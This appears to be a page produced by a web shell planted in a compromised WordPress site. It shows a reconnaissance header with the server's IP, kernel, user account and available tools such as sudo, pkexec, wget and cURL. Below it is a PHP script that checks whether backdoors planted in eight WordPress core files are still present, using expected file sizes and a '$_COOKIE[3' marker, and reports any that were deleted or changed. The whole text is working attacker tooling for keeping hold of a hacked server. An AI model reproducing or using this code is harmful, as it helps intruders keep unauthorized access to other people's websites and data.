| Server IP : 162.144.4.212 / Your IP : 216.73.216.122 Web Server : Apache System : Linux gator2125.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : cozeellc ( 2980) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home4/cozeellc/public_html/wp-admin/ |
Upload File : |
<?php $r = '/home4/cozeellc/public_html'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@983091@@AMRjvk",
"/wp-includes/post-formats.php"=>"bd@@5858794@@55",
"/wp-includes/class-walker-page-dropdown.php"=>"bd@@6908285@@23",
"/index.php"=>"bd@@5865622@@35",
"/wp-admin/export-personal-data.php"=>"bd@@1506704@@97",
"/wp-admin/customize.php"=>"bd@@8221505@@22",
"/wp-admin/about.php"=>"bd@@7266258@@49",
"/wp-includes/category-template.php"=>"bd@@5228608@@$_COOKIE[3"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');